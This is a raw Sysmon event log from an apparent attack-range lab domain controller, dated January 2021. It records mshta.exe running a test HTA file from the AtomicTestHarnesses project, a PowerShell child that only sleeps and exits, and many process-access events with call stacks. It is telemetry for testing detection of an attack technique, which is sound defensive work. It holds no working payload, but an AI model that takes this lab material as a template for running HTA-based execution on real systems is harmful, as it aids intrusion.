15:59:14.070{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000022700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDownloads2021-01-20 15:59:14.054{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta2021-01-20 15:44:17.216 10341000x800000000000000022699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.054{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5352-6008-2A06-00000000A301}1324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.054{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.054{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.054{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.054{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.054{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.054{7901BC46-5351-6008-2806-00000000A301}8326296C:\Windows\System32\mshta.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.056{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta" 10341000x800000000000000022691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.023{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.023{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2706-00000000A301}4972C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2506-00000000A301}7236C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 